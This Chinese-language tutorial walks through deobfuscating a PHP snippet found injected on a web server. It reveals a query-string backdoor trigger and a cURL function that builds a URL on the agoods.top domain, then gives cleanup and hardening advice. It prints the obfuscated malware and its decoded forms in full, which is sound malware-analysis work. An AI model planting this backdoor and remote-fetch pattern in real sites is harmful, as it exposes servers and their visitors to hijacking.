PHP 恶意代码去混淆:逐步解析与安全实践
在 web 开发中,服务器被注入恶意代码是一种常见的安全威胁。这些恶意代码通常会经过混淆处理,以逃避检测并增加分析难度。本教程将以一个具体的 php 混淆代码片段为例,详细讲解如何一步步对其进行去混淆,揭示其真实功能,并探讨其潜在的安全风险。
1. 初始混淆代码分析
首先,我们来看这段被发现注入到服务器文件中的 PHP 代码片段:
<?php
@header('Content-Type:text/html;charset=utf-8');
error_reporting(0);
$OOOOOO="%71%77%65%72%74%79%75%69%6f%70%61%73%64%66%67%68%6a%6b%6c%7a%78%63%76%62%6e%6d%51%57%45%52%54%59%55%49%4f%50%41%53%44%46%47%48%4a%4b%4c%5a%58%43%56%42%4e%4d%5f%2d%22%3f%3e%20%3c%2e%2d%3d%3a%2f%31%32%33%30%36%35%34%38%37%39%27%3b%28%29%26%5e%24%5b%5d%5c%5c%25%7b%7d%21%2a%7c%2b%2c";
global $O;
$O=urldecode($OOOOOO);
if($_GET[$O{21}.$O{15}.$O{2}.$O{24}]==$O{69}.$O{64}.$O{53}.$O{21}.$O{24}){
$oooOoOoOoooOooOOooooo = file_get_contents(__FILE__);
$oooOoOoOoOoooooOOooo = explode($O{58}.$O{55}.$O{9}.$O{15}.$O{9},$oooOoOoOoooOooOOooooo);
if(strpos($oooOoOoOoOoooooOOooo[1],'%71%77%65')!==false){
echo $O{81}.$O{8}.$O{17}.$O{88}.$O{82};
exit;
}else{
echo $O{81}.$O{13}.$O{10}.$O{7}.$O{18}.$O{88}.$O{82};
exit;
}
}
$oOooOO='z0807_1';
$oOooOOoO=$O{15}.$O{4}.$O{4}.$O{9}.$O{62}.$O{63}.$O{63}.$oOooOO.$O{59}.$O{10}.$O{14}.$O{8}.$O{8}.$O{12}.$O{11}.$O{59}.$O{4}.$O{8}.$O{9};
function ooooooooOOOOOOOOoooooOOO($oooOOOoOoo){
$ooooOOOooOo=curl_init();
curl_setopt ($ooooOOOooOo, CURLOPT_URL, $oooOOOoOoo);curl_setopt ($ooooOOOooOo, CURLOPT_RETURNTRANSFER, 1);curl_setopt ($ooooOOOooOo, CURLOPT_CONNECTTIMEOUT, 5);$oooooOOOOooO = curl_exec($ooooOOOooOo);
curl_close($ooooOOOooOo);
return $oooooOOOOooO;
}这段代码的特点是使用了大量难以阅读的变量名(如 $OOOOOO、$oOooOOoO 等),以及通过字符串索引(如 $O{21})来构建新的字符串,这使得代码的真实意图变得模糊。error_reporting(0) 旨在抑制所有错误报告,进一步隐藏其行为。
2. 逐步去混淆
去混淆过程需要耐心和细致,我们将按照以下步骤进行:
2.1 解码 $OOOOOO 变量
代码的第一步是将 $OOOOOO 变量进行 URL 解码,并赋值给全局变量 $O。这是去混淆的关键第一步,因为它定义了后续所有字符串构建的基础字符集。
立即学习“PHP免费学习笔记(深入)”;
$OOOOOO="%71%77%65%72%74%79%75%69%6f%70%61%73%64%66%67%68%6a%6b%6c%7a%78%63%76%62%6e%6d%51%57%45%52%54%59%55%49%4f%50%41%53%44%46%47%48%4a%4b%4c%5a%58%43%56%42%4e%4d%5f%2d%22%3f%3e%20%3c%2e%2d%3d%3a%2f%31%32%33%30%36%35%34%38%37%39%27%3b%28%29%26%5e%24%5b%5d%5c%5c%25%7b%7d%21%2a%7c%2b%2c";
global $O;
$O=urldecode($OOOOOO);
// 解码后,$O 的内容如下:
// $O = "qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM_-"?> <.-=:/1230654879';()&^$[]\%{}!*|+,";这个字符串包含了英文字母(大小写)、数字、特殊符号等,看起来像是键盘上的字符顺序排列。
2.2 替换字符串索引访问
接下来,代码中大量使用了 $O{x} 这种(在 PHP 7.4+ 中已弃用,但在旧版本中有效)的字符串索引访问方式来获取单个字符并拼接成新的字符串。我们需要将所有这些 $O{x} 表达式替换为其对应的实际字符。
例如,$O{21} 对应 $O 字符串中的第22个字符(索引从0开始),即 'c'。
经过替换后,代码片段将变为:
if($_GET["c"."h"."e"."n"]=="5"."1"."-"."c"."n"){
$oooOoOoOoooOooOOooooo = file_get_contents(__FILE__);
$oooOoOoOoOoooooOOooo = explode("<"."?"."p"."h"."p",$oooOoOoOoooOooOOooooo);
if(strpos($oooOoOoOoOoooooOOooo[1],'%71%77%65')!==false){
echo "["."o"."k"."!"."]";
exit;
}else{
echo "["."f"."a"."i"."l"."!"."]";
exit;
}
}
$oOooOO='z0807_1';
$oOooOOoO="h"."t"."t"."p".":"."/"."/".$oOooOO."."."a"."g"."o"."o"."d"."s"."."."t"."o"."p";
function ooooooooOOOOOOOOoooooOOO($oooOOOoOoo){
$ooooOOOooOo=curl_init();
curl_setopt ($ooooOOOooOo, CURLOPT_URL, $oooOOOoOoo);curl_setopt ($ooooOOOooOo, CURLOPT_RETURNTRANSFER, 1);curl_setopt ($ooooOOOooOo, CURLOPT_CONNECTTIMEOUT, 5);$oooooOOOOooO = curl_exec($ooooOOOooOo);
curl_close($ooooOOOooOo);
return $oooooOOOOooO;
}2.3 合并字符串字面量
为了提高可读性,我们可以将通过 . 运算符连接的字符串字面量合并成一个完整的字符串。
if($_GET["chen"]=="51-cn"){
$oooOoOoOoooOooOOooooo = file_get_contents(__FILE__);
$oooOoOoOoOoooooOOooo = explode("<?php",$oooOoOoOoooOooOOooooo);
if(strpos($oooOoOoOoOoooooOOooo[1],'%71%77%65')!==false){
echo "[ok!]";
exit;
}else{
echo "[fail!]";
exit;
}
}
$oOooOO='z0807_1';
$oOooOOoO="http://".$oOooOO.".agoods.top";
function ooooooooOOOOOOOOoooooOOO($oooOOOoOoo){
$ooooOOOooOo=curl_init();
curl_setopt ($ooooOOOooOo, CURLOPT_URL, $oooOOOoOoo);curl_setopt ($ooooOOOooOo, CURLOPT_RETURNTRANSFER, 1);curl_setopt ($ooooOOOooOo, CURLOPT_CONNECTTIMEOUT, 5);$oooooOOOOooO = curl_exec($ooooOOOooOo);
curl_close($ooooOOOooOo);
return $oooooOOOOooO;
}2.4 变量重命名与代码格式化
最后一步是重命名那些混淆的变量,使其具有描述性,并对代码进行格式化,使其更符合标准的可读性规范。同时,将长行代码拆分成多行,提高清晰度。
if($_GET["chen"]=="51-cn"){
$thisFileSource = file_get_contents(__FILE__);
$parts = explode("<?php",$thisFileSource);
if(strpos($parts[1],'%71%77%65')!==false){
echo "[ok!]";
exit;
}else{
echo "[fail!]";
exit;
}
}
$subdomain='z0807_1';
$url="http://".$subdomain.".agoods.top";
function sendRequest($targetUrl){
$curlHandle=curl_init();
curl_setopt ($curlHandle, CURLOPT_URL, $targetUrl);
curl_setopt ($curlHandle, CURLOPT_RETURNTRANSFER, 1);
curl_setopt ($curlHandle, CURLOPT_CONNECTTIMEOUT, 5);
$result = curl_exec($curlHandle);
curl_close($curlHandle);
return $result;
}3. 代码功能分析与潜在风险
去混淆后的代码揭示了其主要功能:
条件执行检查: 代码首先检查 $_GET 参数中是否存在 chen 键,并且其值是否为 51-cn。如果条件满足,则执行后续逻辑。这通常是一个后门或特定触发机制。
-
文件内容自检: 如果条件满足,代码会读取当前文件(__FILE__)的全部内容,然后以 <?php 作为分隔符将其分割成数组 $parts。 接着,它检查 $parts 数组的第二个元素(即第一个 <?php 标签之后的所有代码)是否包含 %71%77%65 这个字符串(URL解码后为 qwe)。
- 如果包含,则输出 [ok!] 并退出。
- 如果不包含,则输出 [fail!] 并退出。
分析: 这种自检机制看起来有些多余,因为如果代码本身不存在,它就不会运行。如果存在,它总会包含 %71%77%65 (即 $OOOOOO 变量的开头部分)。这可能是为了验证代码的完整性或作为某种调试/确认机制。
-
外部请求函数定义: 代码定义了一个名为 sendRequest (原 ooooooooOOOOOOOOoooooOOO) 的函数,该函数使用 cURL 库向指定的 URL 发送 GET 请求,并返回响应内容。 同时,它构建了一个 URL http://z0807_1.agoods.top,但在这个代码片段中,该 URL 并没有被 sendRequest 函数实际调用。
潜在风险:
- 未执行的外部请求: 虽然 sendRequest 函数和目标 URL 被定义了,但在这个片段中并未被调用。这强烈暗示在服务器上可能存在其他被注入的代码,会调用这个函数,或者这个片段本身只是一个更大恶意脚本的一部分。攻击者通常会通过这种方式从远程服务器获取更多恶意内容,例如广告、重定向脚本、钓鱼页面或更高级的恶意负载。
- 域名 agoods.top: 对 agoods.top 域名的调查显示,它与许多被劫持的网站和恶意活动相关,例如强制用户重定向到虚假的“浏览器更新”页面。这进一步证实了这段代码的恶意性质。
- error_reporting(0): 禁用错误报告是恶意代码的典型特征,旨在避免在执行过程中暴露任何错误信息,从而隐藏其存在和行为。
4. 防范与清理建议
- 立即隔离: 如果发现此类代码,应立即将受感染的服务器或文件隔离,防止进一步传播或损害。
- 完整扫描与清理: 对服务器进行全面的恶意软件扫描,查找所有被注入的文件。手动检查所有 PHP 文件,特别是入口文件、公共函数库以及经常被修改的文件。
- 日志分析: 检查 Web 服务器(如 Apache/Nginx)和 PHP 错误日志,寻找异常请求模式、可疑的 IP 地址或文件访问记录。
- 更新与打补丁: 确保所有软件(操作系统、Web 服务器、PHP 版本、CMS 系统及插件)都更新到最新版本,并应用所有安全补丁。
-
强化安全配置:
- 禁用不必要的 PHP 函数(如 eval、shell_exec、system 等)。
- 限制文件上传权限和执行权限。
- 使用 Web 应用防火墙 (WAF) 过滤恶意请求。
- 定期备份数据。
- 代码审计: 定期对网站代码进行安全审计,查找潜在的漏洞和恶意注入点。
- 密码安全: 更改所有服务器和数据库密码,确保使用强密码。
总结
去混淆恶意 PHP 代码是识别和应对 Web 安全威胁的关键步骤。通过本文的逐步解析,我们可以看到,即使是看似复杂的混淆代码,通过系统性的分析也能揭示其真实面目。这段代码不仅包含一个用于触发的后门条件,还定义了一个用于外部通信的 cURL 函数,并指向一个已知的恶意域名。理解这些恶意机制有助于我们更好地防范未来的攻击,并采取有效的清理措施来保护服务器和用户数据。
